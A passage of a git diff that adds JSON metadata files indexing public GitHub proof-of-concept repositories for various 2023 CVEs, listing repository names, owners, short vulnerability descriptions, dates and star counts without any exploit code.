false, + "created_at": "2023-07-10T20:54:56Z", + "updated_at": "2024-12-10T18:37:38Z", + "pushed_at": "2023-07-10T21:00:09Z", + "stargazers_count": 57, + "watchers_count": 57, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 57, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 792716677, + "name": "CVE-2023-2255", + "full_name": "SaintMichae64\/CVE-2023-2255", + "owner": { + "login": "SaintMichae64", + "id": 71401539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71401539?v=4", + "html_url": "https:\/\/github.com\/SaintMichae64", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SaintMichae64\/CVE-2023-2255", + "description": null, + "fork": false, + "created_at": "2024-04-27T11:21:11Z", + "updated_at": "2024-05-04T10:24:16Z", + "pushed_at": "2024-05-04T10:24:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22551.json b/2023/CVE-2023-22551.json new file mode 100644 index 0000000000..f0fcaab058 --- /dev/null +++ b/2023/CVE-2023-22551.json @@ -0,0 +1,33 @@ +[ + { + "id": 611568639, + "name": "CVE-2023-22551", + "full_name": "viswagb\/CVE-2023-22551", + "owner": { + "login": "viswagb", + "id": 5297466, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5297466?v=4", + "html_url": "https:\/\/github.com\/viswagb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/viswagb\/CVE-2023-22551", + "description": "Reproduce CVE-2023-22551", + "fork": false, + "created_at": "2023-03-09T04:47:37Z", + "updated_at": "2023-03-09T04:47:37Z", + "pushed_at": "2023-03-09T04:47:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22621.json b/2023/CVE-2023-22621.json new file mode 100644 index 0000000000..fece73c44a --- /dev/null +++ b/2023/CVE-2023-22621.json @@ -0,0 +1,33 @@ +[ + { + "id": 632533206, + "name": "CVE-2023-22621-POC", + "full_name": "sofianeelhor\/CVE-2023-22621-POC", + "owner": { + "login": "sofianeelhor", + "id": 43454096, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43454096?v=4", + "html_url": "https:\/\/github.com\/sofianeelhor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sofianeelhor\/CVE-2023-22621-POC", + "description": "CVE-2023-22621: SSTI to RCE by Exploiting Email Templates affecting Strapi Versions <=4.5.5", + "fork": false, + "created_at": "2023-04-25T15:50:05Z", + "updated_at": "2024-03-21T17:50:01Z", + "pushed_at": "2023-04-25T16:25:22Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22622.json b/2023/CVE-2023-22622.json new file mode 100644 index 0000000000..ae118100c1 --- /dev/null +++ b/2023/CVE-2023-22622.json @@ -0,0 +1,33 @@ +[ + { + "id": 774948865, + "name": "CVE-2023-22622", + "full_name": "michael-david-fry\/CVE-2023-22622", + "owner": { + "login": "michael-david-fry", + "id": 4213469, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4213469?v=4", + "html_url": "https:\/\/github.com\/michael-david-fry", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/michael-david-fry\/CVE-2023-22622", + "description": "Python Script that will DoS a WP server that is utilizing WP-CRON", + "fork": false, + "created_at": "2024-03-20T13:48:48Z", + "updated_at": "2024-08-02T13:26:56Z", + "pushed_at": "2024-08-02T13:26:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22726.json b/2023/CVE-2023-22726.json new file mode 100644 index 0000000000..f3b58f3dee --- /dev/null +++ b/2023/CVE-2023-22726.json @@ -0,0 +1,33 @@ +[ + { + "id": 807560999, + "name": "POC-CVE-2023-22726", + "full_name": "ProxyPog\/POC-CVE-2023-22726", + "owner": { + "login": "ProxyPog", + "id": 73880723, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73880723?v=4", + "html_url": "https:\/\/github.com\/ProxyPog", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ProxyPog\/POC-CVE-2023-22726", + "description": "CVE-2023-22726", + "fork": false, + "created_at": "2024-05-29T10:38:30Z", + "updated_at": "2024-11-11T19:30:31Z", + "pushed_at": "2024-11-11T19:30:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22809.json b/2023/CVE-2023-22809.json new file mode 100644 index 0000000000..d400bd1bd6 --- /dev/null +++ b/2023/CVE-2023-22809.json @@ -0,0 +1,357 @@ +[ + { + "id": 591696201, + "name": "CVE-2023-22809-sudoedit-privesc", + "full_name": "n3m1sys\/CVE-2023-22809-sudoedit-privesc", + "owner": { + "login": "n3m1sys", + "id": 30940342, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30940342?v=4", + "html_url": "https:\/\/github.com\/n3m1sys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n3m1sys\/CVE-2023-22809-sudoedit-privesc", + "description": "A script to automate privilege escalation with CVE-2023-22809 vulnerability", + "fork": false, + "created_at": "2023-01-21T15:19:23Z", + "updated_at": "2024-12-04T23:26:48Z", + "pushed_at": "2023-02-15T18:10:53Z", + "stargazers_count": 149, + "watchers_count": 149, + "has_discussions": false, + "forks_count": 37, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-22809", + "exploit", + "privesc", + "script", + "sudo", + "sudoedit", + "vulnerability" + ], + "visibility": "public", + "forks": 37, + "watchers": 149, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 605221519, + "name": "CVE-2023-22809", + "full_name": "M4fiaB0y\/CVE-2023-22809", + "owner": { + "login": "M4fiaB0y", + "id": 95071636, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95071636?v=4", + "html_url": "https:\/\/github.com\/M4fiaB0y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M4fiaB0y\/CVE-2023-22809", + "description": null, + "fork": false, + "created_at": "2023-02-22T17:50:03Z", + "updated_at": "2023-04-21T09:04:44Z", + "pushed_at": "2023-02-22T17:54:37Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 624236850, + "name": "CVE-2023-22809-sudo-POC", + "full_name": "3yujw7njai\/CVE-2023-22809-sudo-POC", + "owner": { + "login": "3yujw7njai", + "id": 7390055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7390055?v=4", + "html_url": "https:\/\/github.com\/3yujw7njai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3yujw7njai\/CVE-2023-22809-sudo-POC", + "description": "CVE-2023-22809 Linux Sudo", + "fork": false, + "created_at": "2023-04-06T03:11:48Z", + "updated_at": "2024-11-17T02:30:25Z", + "pushed_at": "2023-04-06T03:17:33Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 651208036, + "name": "patch_CVE-2023-22809", + "full_name": "hello4r1end\/patch_CVE-2023-22809", + "owner": { + "login": "hello4r1end", + "id": 60706453, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60706453?v=4", + "html_url": "https:\/\/github.com\/hello4r1end", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hello4r1end\/patch_CVE-2023-22809", + "description": null, + "fork": false, + "created_at": "2023-06-08T18:39:44Z", + "updated_at": "2023-06-08T18:47:06Z", + "pushed_at": "2023-06-08T18:47:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 655945165, + "name": "CVE-2023-22809", + "full_name": "Chan9Yan9\/CVE-2023-22809", + "owner": { + "login": "Chan9Yan9", + "id": 67211718, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67211718?v=4", + "html_url": "https:\/\/github.com\/Chan9Yan9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chan9Yan9\/CVE-2023-22809", + "description": "Analysis & Exploit", + "fork": false, + "created_at": "2023-06-20T00:38:08Z", + "updated_at": "2024-10-15T01:08:17Z", + "pushed_at": "2023-06-20T01:31:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 658377223, + "name": "CVE-2023-22809", + "full_name": "pashayogi\/CVE-2023-22809", + "owner": { + "login": "pashayogi", + "id": 50790111, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50790111?v=4", + "html_url": "https:\/\/github.com\/pashayogi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pashayogi\/CVE-2023-22809", + "description": null, + "fork": false, + "created_at": "2023-06-25T15:11:01Z", + "updated_at": "2024-07-16T13:10:27Z", + "pushed_at": "2023-06-25T15:11:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 664513700, + "name": "CVE-2023-22809", + "full_name": "asepsaepdin\/CVE-2023-22809", + "owner": { + "login": "asepsaepdin", + "id": 122620685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122620685?v=4", + "html_url": "https:\/\/github.com\/asepsaepdin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/asepsaepdin\/CVE-2023-22809", + "description": null, + "fork": false, + "created_at": "2023-07-10T06:38:14Z", + "updated_at": "2025-01-05T17:10:39Z", + "pushed_at": "2023-07-13T06:20:19Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 675212080, + "name": "CVE-2023-22809", + "full_name": "Toothless5143\/CVE-2023-22809", + "owner": { + "login": "Toothless5143", + "id": 81353028, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81353028?v=4", + "html_url": "https:\/\/github.com\/Toothless5143", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Toothless5143\/CVE-2023-22809", + "description": "Running this exploit on a vulnerable system allows a local attacker to gain a root shell on the machine.", + "fork": false, + "created_at": "2023-08-06T06:46:40Z", + "updated_at": "2024-08-07T07:22:23Z", + "pushed_at": "2023-09-03T06:54:49Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-22809", + "exploit", + "sudoedit", + "vulnerability" + ], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 842365089, + "name": "CVE-2023-22809", + "full_name": "AntiVlad\/CVE-2023-22809", + "owner": { + "login": "AntiVlad", + "id": 70754771, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70754771?v=4", + "html_url": "https:\/\/github.com\/AntiVlad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AntiVlad\/CVE-2023-22809", + "description": null, + "fork": false, + "created_at": "2024-08-14T07:48:10Z", + "updated_at": "2024-08-14T07:49:03Z", + "pushed_at": "2024-08-14T07:49:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 847582059, + "name": "SUDO-privilege-escalation", + "full_name": "laxmiyamkolu\/SUDO-privilege-escalation", + "owner": { + "login": "laxmiyamkolu", + "id": 85497904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85497904?v=4", + "html_url": "https:\/\/github.com\/laxmiyamkolu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/laxmiyamkolu\/SUDO-privilege-escalation", + "description": "Sudo Privilege Escalation: CVE-2023-22809 Simulation This project simulates the Sudo privilege escalation vulnerability (CVE-2023-22809) to demonstrate how unauthorized root access can be gained. It involves identifying and exploiting this vulnerability in a controlled environment using Parrot OS, the Sudo command, and Bash scripting.", + "fork": false, + "created_at": "2024-08-26T06:27:59Z", + "updated_at": "2024-08-26T07:09:13Z", + "pushed_at": "2024-08-26T07:09:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 848853200, + "name": "CVE-2023-22809-Exploiter", + "full_name": "D0rDa4aN919\/CVE-2023-22809-Exploiter", + "owner": { + "login": "D0rDa4aN919", + "id": 108623675, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108623675?v=4", + "html_url": "https:\/\/github.com\/D0rDa4aN919", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/D0rDa4aN919\/CVE-2023-22809-Exploiter", + "description": null, + "fork": false, + "created_at": "2024-08-28T14:22:53Z", + "updated_at": "2024-09-06T08:25:06Z", + "pushed_at": "2024-09-06T08:25:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22855.json b/2023/CVE-2023-22855.json new file mode 100644 index 0000000000..60b18a6145 --- /dev/null +++ b/2023/CVE-2023-22855.json @@ -0,0 +1,33 @@ +[ + { + "id": 703592151, + "name": "CVE-2023-22855", + "full_name": "vianic\/CVE-2023-22855", + "owner": { + "login": "vianic", + "id": 61748137, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61748137?v=4", + "html_url": "https:\/\/github.com\/vianic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vianic\/CVE-2023-22855", + "description": "Security Vulnerability - Kardex Mlog MCC", + "fork": false, + "created_at": "2023-10-11T14:27:08Z", + "updated_at": "2023-10-11T14:27:09Z", + "pushed_at": "2023-10-11T14:34:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22884.json b/2023/CVE-2023-22884.json new file mode 100644 index 0000000000..ce7de03181 --- /dev/null +++ b/2023/CVE-2023-22884.json @@ -0,0 +1,33 @@ +[ + { + "id": 672206923, + "name": "CVE-2023-22884-Airflow-SQLi", + "full_name": "jakabakos\/CVE-2023-22884-Airflow-SQLi", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2023-22884-Airflow-SQLi", + "description": "CVE-2023-22884 PoC", + "fork": false, + "created_at": "2023-07-29T09:26:36Z", + "updated_at": "2024-12-09T01:45:13Z", + "pushed_at": "2023-09-07T08:36:47Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22894.json b/2023/CVE-2023-22894.json new file mode 100644 index 0000000000..b5216420a5 --- /dev/null +++ b/2023/CVE-2023-22894.json @@ -0,0 +1,33 @@ +[ + { + "id": 632200273, + "name": "CVE-2023-22894", + "full_name": "Saboor-Hakimi\/CVE-2023-22894", + "owner": { + "login": "Saboor-Hakimi", + "id": 44523544, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44523544?v=4", + "html_url": "https:\/\/github.com\/Saboor-Hakimi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Saboor-Hakimi\/CVE-2023-22894", + "description": "CVE-2023-22894", + "fork": false, + "created_at": "2023-04-24T23:26:13Z", + "updated_at": "2024-12-12T01:55:23Z", + "pushed_at": "2023-04-24T23:38:15Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22906.json b/2023/CVE-2023-22906.json new file mode 100644 index 0000000000..23c1872282 --- /dev/null +++ b/2023/CVE-2023-22906.json @@ -0,0 +1,37 @@ +[ + { + "id": 635964756, + "name": "CVE-2023-22906", + "full_name": "nonamecoder\/CVE-2023-22906", + "owner": { + "login": "nonamecoder", + "id": 5160055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5160055?v=4", + "html_url": "https:\/\/github.com\/nonamecoder", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nonamecoder\/CVE-2023-22906", + "description": "Proof of Concept for CVE-2023-22906", + "fork": false, + "created_at": "2023-05-03T20:52:19Z", + "updated_at": "2024-04-20T01:38:57Z", + "pushed_at": "2023-07-08T23:15:08Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "iot", + "security", + "vulnerability-research" + ], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22941.json b/2023/CVE-2023-22941.json new file mode 100644 index 0000000000..d222570af9 --- /dev/null +++ b/2023/CVE-2023-22941.json @@ -0,0 +1,33 @@ +[ + { + "id": 603212493, + "name": "CVE-2023-22941", + "full_name": "eduardosantos1989\/CVE-2023-22941", + "owner": { + "login": "eduardosantos1989", + "id": 24944919, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24944919?v=4", + "html_url": "https:\/\/github.com\/eduardosantos1989", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eduardosantos1989\/CVE-2023-22941", + "description": "In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, an improperly-formatted ‘INGEST_EVAL’ parameter in a [Field Transformation](https:\/\/docs.splunk.com\/Documentation\/Splunk\/latest\/Knowledge\/Managefieldtransforms) crashes the Splunk daemon (splunkd). CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2023-02-17T21:26:05Z", + "updated_at": "2023-02-20T16:30:21Z", + "pushed_at": "2023-02-17T21:27:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22960.json b/2023/CVE-2023-22960.json new file mode 100644 index 0000000000..c894dc2986 --- /dev/null +++ b/2023/CVE-2023-22960.json @@ -0,0 +1,40 @@ +[ + { + "id": 592657918, + "name": "CVE-2023-22960", + "full_name": "t3l3machus\/CVE-2023-22960", + "owner": { + "login": "t3l3machus", + "id": 75489922, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75489922?v=4", + "html_url": "https:\/\/github.com\/t3l3machus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/t3l3machus\/CVE-2023-22960", + "description": "This vulnerability allows an attacker to bypass the credentials brute-force prevention mechanism of the Embedded Web Server (interface) of more than 60 Lexmark printer models. This issue affects both username-password and PIN authentication.", + "fork": false, + "created_at": "2023-01-24T08:33:19Z", + "updated_at": "2024-11-25T12:03:38Z", + "pushed_at": "2024-07-19T06:36:55Z", + "stargazers_count": 85, + "watchers_count": 85, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bruteforce", + "cve-2023-22960", + "hacking", + "password-attack", + "pentesting", + "redteam" + ], + "visibility": "public", + "forks": 16, + "watchers": 85, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22974.json b/2023/CVE-2023-22974.json new file mode 100644 index 0000000000..e88084dfef --- /dev/null +++ b/2023/CVE-2023-22974.json @@ -0,0 +1,33 @@ +[ + { + "id": 605704470, + "name": "CVE-2023-22974", + "full_name": "gbrsh\/CVE-2023-22974", + "owner": { + "login": "gbrsh", + "id": 36970331, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36970331?v=4", + "html_url": "https:\/\/github.com\/gbrsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gbrsh\/CVE-2023-22974", + "description": "OpenEMR < 7.0.0 Arbitrary File Read", + "fork": false, + "created_at": "2023-02-23T18:14:05Z", + "updated_at": "2024-01-04T23:28:14Z", + "pushed_at": "2023-02-23T18:15:34Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23138.json b/2023/CVE-2023-23138.json new file mode 100644 index 0000000000..6016ff75a2 --- /dev/null +++ b/2023/CVE-2023-23138.json @@ -0,0 +1,33 @@ +[ + { + "id": 585149215, + "name": "CVE-2023-23138", + "full_name": "OmarAtallahh\/CVE-2023-23138", + "owner": { + "login": "OmarAtallahh", + "id": 42843641, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42843641?v=4", + "html_url": "https:\/\/github.com\/OmarAtallahh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OmarAtallahh\/CVE-2023-23138", + "description": "short view of ruby on rails properties misconfiguration ", + "fork": false, + "created_at": "2023-01-04T12:51:33Z", + "updated_at": "2023-03-08T18:48:45Z", + "pushed_at": "2023-03-06T22:10:50Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23169.json b/2023/CVE-2023-23169.json new file mode 100644 index 0000000000..4f7a9b4670 --- /dev/null +++ b/2023/CVE-2023-23169.json @@ -0,0 +1,33 @@ +[ + { + "id": 634830191, + "name": "CVE-2023-23169", + "full_name": "S4nshine\/CVE-2023-23169", + "owner": { + "login": "S4nshine", + "id": 11758455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11758455?v=4", + "html_url": "https:\/\/github.com\/S4nshine", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/S4nshine\/CVE-2023-23169", + "description": null, + "fork": false, + "created_at": "2023-05-01T10:06:44Z", + "updated_at": "2023-05-03T06:23:48Z", + "pushed_at": "2023-05-01T10:51:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23192.json b/2023/CVE-2023-23192.json new file mode 100644 index 0000000000..47ed2bf229 --- /dev/null +++ b/2023/CVE-2023-23192.json @@ -0,0 +1,64 @@ +[ + { + "id": 616350414, + "name": "CVE-2023-23192", + "full_name": "pinarsadioglu\/CVE-2023-23192", + "owner": { + "login": "pinarsadioglu", + "id": 18392750, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18392750?v=4", + "html_url": "https:\/\/github.com\/pinarsadioglu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pinarsadioglu\/CVE-2023-23192", + "description": "CVE-2023-23192", + "fork": false, + "created_at": "2023-03-20T08:06:55Z", + "updated_at": "2024-12-04T18:15:39Z", + "pushed_at": "2023-03-27T07:42:56Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 616394169, + "name": "CVE-2023-23192", + "full_name": "Penkyzduyi\/CVE-2023-23192", + "owner": { + "login": "Penkyzduyi", + "id": 69184246, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69184246?v=4", + "html_url": "https:\/\/github.com\/Penkyzduyi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Penkyzduyi\/CVE-2023-23192", + "description": "CVE-2023-23192 test ", + "fork": false, + "created_at": "2023-03-20T09:59:39Z", + "updated_at": "2023-03-20T09:59:39Z", + "pushed_at": "2023-03-20T09:59:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23279.json b/2023/CVE-2023-23279.json new file mode 100644 index 0000000000..0532eec32e --- /dev/null +++ b/2023/CVE-2023-23279.json @@ -0,0 +1,33 @@ +[ + { + "id": 613478267, + "name": "CVE-2023-23279", + "full_name": "tuannq2299\/CVE-2023-23279", + "owner": { + "login": "tuannq2299", + "id": 66456080, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66456080?v=4", + "html_url": "https:\/\/github.com\/tuannq2299", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tuannq2299\/CVE-2023-23279", + "description": null, + "fork": false, + "created_at": "2023-03-13T16:39:31Z", + "updated_at": "2023-03-14T14:38:40Z", + "pushed_at": "2023-03-13T16:43:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23333.json b/2023/CVE-2023-23333.json new file mode 100644 index 0000000000..d1774a462e --- /dev/null +++ b/2023/CVE-2023-23333.json @@ -0,0 +1,95 @@ +[ + { + "id": 597984195, + "name": "CVE-2023-23333", + "full_name": "Timorlover\/CVE-2023-23333", + "owner": { + "login": "Timorlover", + "id": 116296194, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/116296194?v=4", + "html_url": "https:\/\/github.com\/Timorlover", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Timorlover\/CVE-2023-23333", + "description": "There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php.", + "fork": false, + "created_at": "2023-02-06T06:20:40Z", + "updated_at": "2023-07-13T20:44:04Z", + "pushed_at": "2023-02-06T06:35:29Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 654621817, + "name": "CVE-2023-23333", + 